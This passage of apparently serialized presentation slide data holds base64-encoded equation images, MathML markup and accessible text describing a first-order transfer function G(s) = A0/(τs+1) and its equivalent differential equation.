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\&quot;,\&quot;slideId\&quot;:308,\&quot;accessibleText\&quot;:\&quot;G open parentheses s close parentheses thin space equals thin space fraction numerator Y open parentheses s close parentheses over denominator U open parentheses s close parentheses end fraction equals space fraction numerator A subscript 0 over denominator tau s space plus 1 end fraction space space space space rightwards double arrow space open parentheses tau s space plus space 1 close parentheses Y open parentheses s close parentheses space equals thin space A subscript 0 U open parentheses s close parentheses\&quot;,\&quot;imageHeight\&quot;:23.774653168353957},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mover&gt;&lt;mrow&gt;&lt;mi&gt;y&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mrow&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;/mover&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;y&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;A&lt;/mi&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/msub&gt;&lt;mi&gt;u&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#x21D2;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mover&gt;&lt;mrow&gt;&lt;mi&gt;y&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mo&gt;-&lt;/mo&gt;&lt;mfrac&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;/mfrac&gt;&lt;mi&gt;y&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mfrac&gt;&lt;msub&gt;&lt;mi&gt;A&lt;/mi&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/msub&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;/mfrac&gt;&lt;/mrow&gt;&lt;mo&gt;&amp;#x2D9;&lt;/mo&gt;&lt;/mover&gt;&lt;mi&gt;u&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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